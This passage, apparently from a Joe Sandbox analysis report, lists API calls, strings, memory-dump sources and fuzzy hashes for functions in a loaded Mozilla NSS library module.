                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(#?Il,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C62
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C76
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C86
                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C93
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CC6
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CDA
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23), ref: 6C492CEA
                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492CF7
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492D4D
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C492D61
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C492D71
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C492D7E
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                          • String ID: #?Il
                                                                                                                                                                                                                          • API String ID: 2446853827-3645613150
                                                                                                                                                                                                                          • Opcode ID: 8b0a2c9f8a7a4b7e524c2255254513bc782c82746092ff7a22a54a76eec893f5
                                                                                                                                                                                                                          • Instruction ID: 7d1eb7de6c9cb28985a7849adc07e7a1bab1163eac542aaa9ae28728dafe65d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b0a2c9f8a7a4b7e524c2255254513bc782c82746092ff7a22a54a76eec893f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E510576D00614ABEB10DF24DC44CAABB78BF1925CB058628EC199BB11EB31FD64C7E1
                                                                                                                                                                                                                          Function 6C4EAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EADB1
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C4EADF4
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C4EAE08
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4EAE25
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C4EAE63
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAE4D
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAE93
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAECC
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C4EAEDE
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C4EAEE6
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAEF5
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C4EAF16
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                          • Opcode ID: 2445e26894205e78421e3443ce0e9ca2b7bd66a8300fc5fb4e78eb89ccb131fa
                                                                                                                                                                                                                          • Instruction ID: 69d4db248a2457f138938533c6f96028f4a2c54286beabd337b85af67d1ceaa8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2445e26894205e78421e3443ce0e9ca2b7bd66a8300fc5fb4e78eb89ccb131fa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C24128B198421067E720DB2C9C45FAA36B8EF4A31FF120929E81496F41FB35A90986D7
                                                                                                                                                                                                                          Function 6C58AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58AF88
                                                                                                                                                                                                                          • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C58AFCE
                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C58AFD9
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58AFEF
                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C58B00F
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B02F
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B070
                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C58B07B
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B084
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58B09B
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B0C4
                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C58B0F3
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B0FC
                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C58B137
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B140
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 235599594-0
                                                                                                                                                                                                                          • Opcode ID: 41aca5875bbf3eee739022bb302c8c112d907a50e3ba1a098c1f6f9ec41a9fa1
                                                                                                                                                                                                                          • Instruction ID: 53a065a8bdd7af5a03b410e6e3f8fbb46bdb11b6992e07d4f373d094171f7cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41aca5875bbf3eee739022bb302c8c112d907a50e3ba1a098c1f6f9ec41a9fa1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD914EB5901621DFCB00DF15CC8085ABBF5FF893187298569D8199BB22E732FD46CB91
                                                                                                                                                                                                                          Function 6C505CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502BF0
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C07
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C1E
                                                                                                                                                                                                                            • Part of subcall function 6C502BE0: free.MOZGLUE(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C4A
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D0F
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D4E
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D62
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D85
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D99
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505DFA
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E33
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E3E
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E47
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E60
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E78
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EB9
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EF0
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F3D
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F4B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4273776295-0
                                                                                                                                                                                                                          • Opcode ID: 5e07febf11c02ad113aa19ee35821bef8108fd9705b0d68142aca448de54ad06
                                                                                                                                                                                                                          • Instruction ID: 95fc93a99129fb44058bec2712c4c1a0bd3e7b655513e6d549f7dd94d7f6bee7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e07febf11c02ad113aa19ee35821bef8108fd9705b0d68142aca448de54ad06
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29719CB5A00B019FD710CF20DC88A96B7E5FF89308F148529E85E87B11EB32FA55CB95
                                                                                                                                                                                                                          Function 6C488DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6C488E22
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C488E36
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488E4F
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6C488E78
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488E9B
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C488EAC
                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C488EDE
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488EF0
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F00
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C488F0E
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C488F39
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F4A
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F5B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C488F72
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C488F82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1569127702-0
                                                                                                                                                                                                                          • Opcode ID: d5401abd28fb0f4c4cc5684b7a6de1b222f0200cefef02c415dbe6ea3db6ec2d
                                                                                                                                                                                                                          • Instruction ID: a745584637d8cc5bc10e931b35f04d6af9d19015eb49c830e6087c2b27b1739d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5401abd28fb0f4c4cc5684b7a6de1b222f0200cefef02c415dbe6ea3db6ec2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C751E2B2E022159FEB00DF68CC84D6EB7B9EF85358B154129EC089B700E731ED4587E1
                                                                                                                                                                                                                          Function 6C580FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Lock.NSS3(?), ref: 6C581000
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C581016
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C581021
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581046
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C58106B
                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C581079
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C581096
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C5810A7
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C5810B4
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C5810BF
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C5810CA
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C5810D5
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C5810E0
                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(?), ref: 6C5810EB
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C581105
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 8544004-0
                                                                                                                                                                                                                          • Opcode ID: fd589b434e47ccbd3c7968f0be40b3cfc80f6ae3a84d88973a1754235e37be1e
                                                                                                                                                                                                                          • Instruction ID: 2c9ec5b42914452ba726b27b2f2fafc9b983fc7b437cc0c5fd2619e3603cbfa7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd589b434e47ccbd3c7968f0be40b3cfc80f6ae3a84d88973a1754235e37be1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D31ABB5905511EBE702AF11EC45A46B771FF41358B184134E80902F61E732FD78DBC6
                                                                                                                                                                                                                          Function 6C3FDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C3FDD56
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C3FDD7C
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C3FDE67
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C3FDEC4
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FDECD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 2339628231-598938438
                                                                                                                                                                                                                          • Opcode ID: c48002f512951e690adbe6fcb8b55fd4b03a0915687623715ae28c554e327d9c
                                                                                                                                                                                                                          • Instruction ID: d0f333e8b8df637d46ff0cc7fdd9f33db8f665a928ad4c3e354ca7e95eeb0057
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c48002f512951e690adbe6fcb8b55fd4b03a0915687623715ae28c554e327d9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EA1E4716043019BD710DF29C884A6AB7F5AF95308F058D2DF8A98BB41E731E846CFA2
                                                                                                                                                                                                                          Function 6C4BEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C4BEE0B
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
